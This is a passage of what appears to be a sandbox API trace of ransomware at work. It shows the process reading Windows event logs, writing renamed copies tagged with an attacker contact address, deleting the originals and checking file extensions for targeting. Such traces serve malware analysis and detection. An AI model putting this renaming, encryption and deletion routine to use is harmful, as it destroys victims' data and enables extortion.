dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0065.867] SetFilePointerEx (in: hFile=0x32c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.867] SetFilePointerEx (in: hFile=0x32c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.867] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-kernel-storemgr%4operational.evtx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0065.867] GetLastError () returned 0x0 [0065.867] ReadFile (in: hFile=0x32c, lpBuffer=0x4026020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x334fecc, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesRead=0x334fecc*=0x11000, lpOverlapped=0x0) returned 1 [0065.869] WriteFile (in: hFile=0x394, lpBuffer=0x4026020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x334fc94, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesWritten=0x334fc94*=0x11010, lpOverlapped=0x0) returned 1 [0065.871] ReadFile (in: hFile=0x32c, lpBuffer=0x4026020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x334fecc, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesRead=0x334fecc*=0x0, lpOverlapped=0x0) returned 1 [0065.871] WriteFile (in: hFile=0x394, lpBuffer=0x4026020*, nNumberOfBytesToWrite=0x13a, lpNumberOfBytesWritten=0x334fc94, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesWritten=0x334fc94*=0x13a, lpOverlapped=0x0) returned 1 [0065.871] SetEndOfFile (hFile=0x394) returned 1 [0065.871] CloseHandle (hObject=0x394) returned 1 [0066.203] SetFilePointerEx (in: hFile=0x32c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.203] SetEndOfFile (hFile=0x32c) returned 1 [0066.204] CloseHandle (hObject=0x32c) returned 1 [0066.204] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0066.204] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-storemgr%4operational.evtx")) returned 1 [0066.204] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx") returned 59 [0066.204] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx") returned 59 [0066.204] lstrlenW (lpString=".doc") returned 4 [0066.204] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0066.204] lstrlenW (lpString=".docx") returned 5 [0066.204] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0066.205] lstrlenW (lpString=".pdf") returned 4 [0066.205] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0066.205] lstrlenW (lpString=".xls") returned 4 [0066.205] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0066.205] lstrlenW (lpString=".xlsx") returned 5 [0066.205] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0066.205] lstrlenW (lpString=".ppt") returned 4 [0066.205] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0066.205] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx") returned 59 [0066.205] lstrlenW (lpString=".zip") returned 4 [0066.205] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0066.205] lstrlenW (lpString=".rar") returned 4 [0066.205] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0066.205] lstrlenW (lpString=".bz2") returned 4 [0066.205] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0066.205] lstrlenW (lpString=".7z") returned 3 [0066.205] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0066.205] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx") returned 59 [0066.205] lstrlenW (lpString=".dbf") returned 4 [0066.205] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0066.205] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx") returned 59 [0066.205] lstrlenW (lpString=".1cd") returned 4 [0066.205] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0066.205] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx") returned 59 [0066.205] lstrlenW (lpString=".jpg") returned 4 [0066.205] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0066.205] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx") returned 59 [0066.205] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx") returned 59 [0066.205] lstrlenW (lpString=".doc") returned 4 [0066.205] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0066.205] lstrlenW (lpString=".docx") returned 5 [0066.205] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0066.205] lstrlenW (lpString=".pdf") returned 4 [0066.205] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0066.205] lstrlenW (lpString=".xls") returned 4 [0066.205] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0066.206] lstrlenW (lpString=".xlsx") returned 5 [0066.206] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0066.206] lstrlenW (lpString=".ppt") returned 4 [0066.206] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0066.206] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx") returned 59 [0066.206] lstrlenW (lpString=".zip") returned 4 [0066.206] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0066.206] lstrlenW (lpString=".rar") returned 4 [0066.206] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0066.206] lstrlenW (lpString=".bz2") returned 4 [0066.206] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0066.206] lstrlenW (lpString=".7z") returned 3 [0066.206] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0066.206] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx") returned 59 [0066.206] lstrlenW (lpString=".dbf") returned 4 [0066.206] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0066.206] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx") returned 59 [0066.206] lstrlenW (lpString=".1cd") returned 4 [0066.206] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0066.206] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx") returned 59 [0066.206] lstrlenW (lpString=".jpg") returned 4 [0066.206] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0066.206] lstrcmpiW (lpString1=".evtx", lpString2=".bat") returned 1 [0066.206] lstrlenW (lpString="Microsoft-Windows-NCSI%4Operational.evtx") returned 40 [0066.206] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-ncsi%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0066.207] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x334ff14 | out: lpFileSize=0x334ff14*=69632) returned 1 [0066.207] CloseHandle (hObject=0x32c) returned 1 [0066.207] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-ncsi%4operational.evtx")) returned 0x20 [0066.207] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-ncsi%4operational.evtx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0066.207] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-ncsi%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0066.207] SetFilePointerEx (in: hFile=0x32c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.207] SetFilePointerEx (in: hFile=0x32c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.207] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-ncsi%4operational.evtx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0066.207] GetLastError () returned 0x0 [0066.207] ReadFile (in: hFile=0x32c, lpBuffer=0x4026020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x334fecc, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesRead=0x334fecc*=0x11000, lpOverlapped=0x0) returned 1 [0066.209] WriteFile (in: hFile=0x394, lpBuffer=0x4026020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x334fc94, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesWritten=0x334fc94*=0x11010, lpOverlapped=0x0) returned 1 [0066.211] ReadFile (in: hFile=0x32c, lpBuffer=0x4026020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x334fecc, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesRead=0x334fecc*=0x0, lpOverlapped=0x0) returned 1 [0066.211] WriteFile (in: hFile=0x394, lpBuffer=0x4026020*, nNumberOfBytesToWrite=0x124, lpNumberOfBytesWritten=0x334fc94, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesWritten=0x334fc94*=0x124, lpOverlapped=0x0) returned 1 [0066.211] SetEndOfFile (hFile=0x394) returned 1 [0066.211] CloseHandle (hObject=0x394) returned 1 [0066.211] SetFilePointerEx (in: hFile=0x32c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.211] SetEndOfFile (hFile=0x32c) returned 1 [0066.212] CloseHandle (hObject=0x32c) returned 1 [0066.212] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0066.213] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-ncsi%4operational.evtx")) returned 1 [0066.213] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx") returned 48 [0066.213] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx") returned 48 [0066.213] lstrlenW (lpString=".doc") returned 4 [0066.213] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0066.213] lstrlenW (lpString=".docx") returned 5 [0066.213] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0066.213] lstrlenW (lpString=".pdf") returned 4 [0066.213] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0066.213] lstrlenW (lpString=".xls") returned 4 [0066.213] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0066.213] lstrlenW (lpString=".xlsx") returned 5 [0066.213] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0066.213] lstrlenW (lpString=".ppt") returned 4 [0066.213] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0066.213] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx") returned 48 [0066.213] lstrlenW (lpString=".zip") returned 4 [0066.213] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0066.213] lstrlenW (lpString=".rar") returned 4 [0066.213] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0066.213] lstrlenW (lpString=".bz2") returned 4 [0066.213] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0066.213] lstrlenW (lpString=".7z") returned 3 [0066.213] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0066.213] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx") returned 48 [0066.213] lstrlenW (lpString=".dbf") returned 4 [0066.213] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0066.214] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx") returned 48 [0066.214] lstrlenW (lpString=".1cd") returned 4 [0066.214] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0066.214] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx") returned 48 [0066.214] lstrlenW (lpString=".jpg") returned 4 [0066.214] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0066.214] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx") returned 48 [0066.214] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx") returned 48 [0066.214] lstrlenW (lpString=".doc") returned 4 [0066.214] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0066.214] lstrlenW (lpString=".docx") returned 5 [0066.214] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0066.214] lstrlenW (lpString=".pdf") returned 4 [0066.214] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0066.214] lstrlenW (lpString=".xls") returned 4 [0066.214] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0066.214] lstrlenW (lpString=".xlsx") returned 5 [0066.214] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0066.214] lstrlenW (lpString=".ppt") returned 4 [0066.214] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0066.214] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx") returned 48 [0066.214] lstrlenW (lpString=".zip") returned 4 [0066.214] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0066.214] lstrlenW (lpString=".rar") returned 4 [0066.214] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0066.214] lstrlenW (lpString=".bz2") returned 4 [0066.214] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0066.214] lstrlenW (lpString=".7z") returned 3 [0066.214] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0066.214] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx") returned 48 [0066.214] lstrlenW (lpString=".dbf") returned 4 [0066.214] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0066.214] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx") returned 48 [0066.214] lstrlenW (lpString=".1cd") returned 4 [0066.214] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0066.214] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx") returned 48 [0066.215] lstrlenW (lpString=".jpg") returned 4 [0066.215] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0066.215] lstrcmpiW (lpString1=".evtx", lpString2=".bat") returned 1 [0066.215] lstrlenW (lpString="Microsoft-Windows-NetworkProfile%4Operational.evtx") returned 50 [0066.215] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-networkprofile%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0066.215] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x334ff14 | out: lpFileSize=0x334ff14*=69632) returned 1 [0066.215] CloseHandle (hObject=0x32c) returned 1 [0066.215] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-networkprofile%4operational.evtx")) returned 0x20 [0066.215] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-networkprofile%4operational.evtx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0066.215] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-networkprofile%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0066.215] SetFilePointerEx (in: hFile=0x32c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.215] SetFilePointerEx (in: hFile=0x32c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.215] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-networkprofile%4operational.evtx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0066.218] GetLastError () returned 0x0 [0066.218] ReadFile (in: hFile=0x32c, lpBuffer=0x4026020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x334fecc, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesRead=0x334fecc*=0x11000, lpOverlapped=0x0) returned 1 [0066.221] WriteFile (in: hFile=0x394, lpBuffer=0x4026020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x334fc94, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesWritten=0x334fc94*=0x11010, lpOverlapped=0x0) returned 1 [0066.223] ReadFile (in: hFile=0x32c, lpBuffer=0x4026020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x334fecc, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesRead=0x334fecc*=0x0, lpOverlapped=0x0) returned 1 [0066.223] WriteFile (in: hFile=0x394, lpBuffer=0x4026020*, nNumberOfBytesToWrite=0x138, lpNumberOfBytesWritten=0x334fc94, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesWritten=0x334fc94*=0x138, lpOverlapped=0x0) returned 1 [0066.223] SetEndOfFile (hFile=0x394) returned 1 [0066.223] CloseHandle (hObject=0x394) returned 1 [0066.223] SetFilePointerEx (in: hFile=0x32c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.223] SetEndOfFile (hFile=0x32c) returned 1 [0066.224] CloseHandle (hObject=0x32c) returned 1 [0066.224] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0066.224] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-networkprofile%4operational.evtx")) returned 1 [0066.224] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx") returned 58 [0066.225] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx") returned 58 [0066.225] lstrlenW (lpString=".doc") returned 4 [0066.225] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0066.225] lstrlenW (lpString=".docx") returned 5 [0066.225] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0066.225] lstrlenW (lpString=".pdf") returned 4 [0066.225] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0066.225] lstrlenW (lpString=".xls") returned 4 [0066.225] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0066.225] lstrlenW (lpString=".xlsx") returned 5 [0066.225] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0066.225] lstrlenW (lpString=".ppt") returned 4 [0066.225] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0066.225] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx") returned 58 [0066.225] lstrlenW (lpString=".zip") returned 4 [0066.225] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0066.225] lstrlenW (lpString=".rar") returned 4 [0066.225] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0066.225] lstrlenW (lpString=".bz2") returned 4 [0066.225] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0066.225] lstrlenW (lpString=".7z") returned 3 [0066.225] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0066.225] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx") returned 58 [0066.225] lstrlenW (lpString=".dbf") returned 4 [0066.225] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0066.225] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx") returned 58 [0066.225] lstrlenW (lpString=".1cd") returned 4 [0066.225] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0066.225] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx") returned 58 [0066.225] lstrlenW (lpString=".jpg") returned 4 [0066.225] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0066.225] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx") returned 58 [0066.225] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx") returned 58 [0066.225] lstrlenW (lpString=".doc") returned 4 [0066.225] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0066.225] lstrlenW (lpString=".docx") returned 5 [0066.226] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0066.226] lstrlenW (lpString=".pdf") returned 4 [0066.226] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0066.226] lstrlenW (lpString=".xls") returned 4 [0066.226] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0066.226] lstrlenW (lpString=".xlsx") returned 5 [0066.226] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0066.226] lstrlenW (lpString=".ppt") returned 4 [0066.226] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0066.226] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx") returned 58 [0066.226] lstrlenW (lpString=".zip") returned 4 [0066.226] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0066.226] lstrlenW (lpString=".rar") returned 4 [0066.226] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0066.226] lstrlenW (lpString=".bz2") returned 4 [0066.226] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0066.226] lstrlenW (lpString=".7z") returned 3 [0066.226] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0066.226] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx") returned 58 [0066.226] lstrlenW (lpString=".dbf") returned 4 [0066.226] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0066.226] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx") returned 58 [0066.226] lstrlenW (lpString=".1cd") returned 4 [0066.226] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0066.226] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx") returned 58 [0066.226] lstrlenW (lpString=".jpg") returned 4 [0066.226] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0066.226] lstrcmpiW (lpString1=".evtx", lpString2=".bat") returned 1 [0066.226] lstrlenW (lpString="Microsoft-Windows-Ntfs%4Operational.evtx") returned 40 [0066.227] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-ntfs%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0066.227] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x334ff14 | out: lpFileSize=0x334ff14*=69632) returned 1 [0066.227] CloseHandle (hObject=0x32c) returned 1 [0066.227] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-ntfs%4operational.evtx")) returned 0x20 [0066.227] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-ntfs%4operational.evtx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0066.227] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-ntfs%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0066.228] SetFilePointerEx (in: hFile=0x32c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.228] SetFilePointerEx (in: hFile=0x32c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.228] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-ntfs%4operational.evtx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0066.228] GetLastError () returned 0x0 [0066.228] ReadFile (in: hFile=0x32c, lpBuffer=0x4026020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x334fecc, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesRead=0x334fecc*=0x11000, lpOverlapped=0x0) returned 1 [0066.230] WriteFile (in: hFile=0x394, lpBuffer=0x4026020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x334fc94, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesWritten=0x334fc94*=0x11010, lpOverlapped=0x0) returned 1 [0066.232] ReadFile (in: hFile=0x32c, lpBuffer=0x4026020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x334fecc, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesRead=0x334fecc*=0x0, lpOverlapped=0x0) returned 1 [0066.232] WriteFile (in: hFile=0x394, lpBuffer=0x4026020*, nNumberOfBytesToWrite=0x124, lpNumberOfBytesWritten=0x334fc94, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesWritten=0x334fc94*=0x124, lpOverlapped=0x0) returned 1 [0066.232] SetEndOfFile (hFile=0x394) returned 1 [0066.232] CloseHandle (hObject=0x394) returned 1 [0066.232] 